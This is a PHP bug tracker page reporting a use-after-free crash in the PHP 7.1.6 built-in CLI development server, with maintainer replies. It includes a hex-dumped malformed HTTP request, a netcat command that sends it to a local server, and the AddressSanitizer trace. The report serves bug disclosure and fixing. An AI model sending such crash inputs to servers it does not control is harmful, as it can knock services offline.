php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #74838 Use-after-free in php_cli_server_client_read_request()
Submitted: 2017-07-01 03:28 UTC Modified: 2021-12-26 04:22 UTC
Votes:1
Avg. Score:2.0 ± 0.0
Reproduced:0 of 1 (0.0%)
From: l dot wei at ntu dot edu dot sg Assigned: cmb (profile)
Status: No Feedback Package: CGI/CLI related
PHP Version: 7.1.6 OS: Ubuntu Linux x86
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2017-07-01 03:28 UTC] l dot wei at ntu dot edu dot sg
Description:
------------
A malformed HTTP packet is able to trigger a use-after-free in the CLI server shipped with PHP. Demonstrated on x86 Ubuntu with php-7.1.6 ASan build. 

Build options:
CC="`which gcc`" CFLAGS="-O0 -g -fsanitize=address" ./configure --prefix="`pwd`/../php7_x86/asan" --disable-shared --enable-mbstring --enable-wddx

Save the hex dump of min_repro.zip to min_repro.hex

$ xxd -r min_repro.hex > min_repro.zip
$ unzip min_repro.zip  // to min_repro
$ export USE_ZEND_OPTIONS=0
$ asan/bin/php -S 127.0.0.1:12345

In another terminal, do
$ cat min_repro | nc 127.0.0.1 12345

It may take a few tries to reproduce the issue.

Test script:
---------------
$ xxd -g 1 min_repro.zip 
0000000: 50 4b 03 04 14 00 02 00 08 00 4e 51 e1 4a 88 f3  PK........NQ.J..
0000010: 3e ba 38 00 00 00 ff 17 00 00 09 00 1c 00 6d 69  >.8...........mi
0000020: 6e 5f 72 65 70 72 6f 55 54 09 00 03 93 04 57 59  n_reproUT.....WY
0000030: b2 04 57 59 75 78 0b 00 01 04 e8 03 00 00 04 e8  ..WYux..........
0000040: 03 00 00 ed c8 a1 11 80 30 10 00 41 9f 2a be 02  ........0..A.*..
0000050: 78 2c 15 c4 c1 4c 42 ff ad 30 88 04 41 03 88 5d  x,...LB..0..A..]
0000060: 71 e2 ce a3 f5 58 73 88 fa 74 5b b2 5c f3 ed 91  q....Xs..t[.\...
0000070: af f2 39 00 00 00 00 00 c0 cf dc 50 4b 01 02 1e  ..9........PK...
0000080: 03 14 00 02 00 08 00 4e 51 e1 4a 88 f3 3e ba 38  .......NQ.J..>.8
0000090: 00 00 00 ff 17 00 00 09 00 18 00 00 00 00 00 01  ................
00000a0: 00 00 00 80 81 00 00 00 00 6d 69 6e 5f 72 65 70  .........min_rep
00000b0: 72 6f 55 54 05 00 03 93 04 57 59 75 78 0b 00 01  roUT.....WYux...
00000c0: 04 e8 03 00 00 04 e8 03 00 00 50 4b 05 06 00 00  ..........PK....
00000d0: 00 00 01 00 01 00 4f 00 00 00 7b 00 00 00 00 00  ......O...{.....

Expected result:
----------------
No Crash (Malformed HTTP request)

Actual result:
--------------
$ asan/bin/php -S 127.0.0.1:12345
PHP 7.1.6 Development Server started at Sat Jul  1 10:56:27 2017
Listening on http://127.0.0.1:12345
Document root is /home/weilei/php7_x86
Press Ctrl-C to quit.
=================================================================
==30329== ERROR: AddressSanitizer: heap-use-after-free on address 0xb57048b3 at pc 0x92208a9 bp 0xbfadcca8 sp 0xbfadcc9c
READ of size 1 at 0xb57048b3 thread T0
    #0 0x92208a8 in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1726
    #1 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329
    #2 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424
    #3 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841
    #4 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442
    #5 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452
    #6 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554
    #7 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384
    #8 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
    #9 0x80667d0 in _start (/home/weilei/php7_x86/asan/bin/php+0x80667d0)
0xb57048b3 is located 3 bytes inside of 5-byte region [0xb57048b0,0xb57048b5)
freed by thread T0 here:
    #0 0xb6167774 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16774)
    #1 0x921fa5e in php_cli_server_client_read_request_on_header_value /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1623
    #2 0x9211145 in php_http_parser_execute /home/weilei/php-7.1.6/sapi/cli/php_http_parser.c:1569
    #3 0x922060d in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1712
    #4 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329
    #5 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424
    #6 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841
    #7 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442
    #8 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452
    #9 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554
    #10 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384
    #11 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
previously allocated by thread T0 here:
    #0 0xb6167854 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16854)
    #1 0x8c86d58 in __zend_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2820
    #2 0x8c84c71 in _safe_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2477
    #3 0x92207a7 in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1722
    #4 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329
    #5 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424
    #6 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841
    #7 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442
    #8 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452
    #9 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554
    #10 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384
    #11 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
SUMMARY: AddressSanitizer: heap-use-after-free /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1726 php_cli_server_client_read_request
Shadow bytes around the buggy address:
  0x36ae08c0: fa fa fd fd fa fa 04 fa fa fa fd fd fa fa 00 00
  0x36ae08d0: fa fa 04 fa fa fa 00 00 fa fa 04 fa fa fa 00 00
  0x36ae08e0: fa fa 04 fa fa fa fd fd fa fa fd fd fa fa 04 fa
  0x36ae08f0: fa fa 00 fa fa fa fd fa fa fa fd fd fa fa 00 04
  0x36ae0900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 05 fa
=>0x36ae0910: fa fa fd fa fa fa[fd]fa fa fa fd fa fa fa fd fd
  0x36ae0920: fa fa 00 04 fa fa 00 03 fa fa 00 03 fa fa 00 00
  0x36ae0930: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fa
  0x36ae0940: fa fa 00 00 fa fa 04 fa fa fa fd fd fa fa 00 00
  0x36ae0950: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x36ae0960: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==30329== ABORTING
Aborted

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-07-01 06:47 UTC] l dot wei at ntu dot edu dot sg
Correction to the typo above in repro steps:

export USE_ZEND_ALLOC=0
 [2017-07-01 20:47 UTC] stas@php.net
-Type: Security +Type: Bug
 [2017-07-01 20:47 UTC] stas@php.net
Not a security issue - CLI server is not a production facility,
 [2017-07-02 01:53 UTC] l dot wei at ntu dot edu dot sg
Indeed, they affect some of the dev environments at most. Thanks for the quick response.
 [2021-12-14 14:43 UTC] cmb@php.net
-Status: Open +Status: Feedback -Assigned To: +Assigned To: cmb
 [2021-12-14 14:43 UTC] cmb@php.net
Is this still an issue with any of the actively supported PHP
versions[1]?

[1] <https://www.php.net/supported-versions.php>
 [2021-12-26 04:22 UTC] php-bugs at lists dot php dot net
No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Re-Opened". Thank you.
 
PHP Copyright © 2001-2022 The PHP Group
All rights reserved.
Last updated: Sun Dec 04 19:05:53 2022 UTC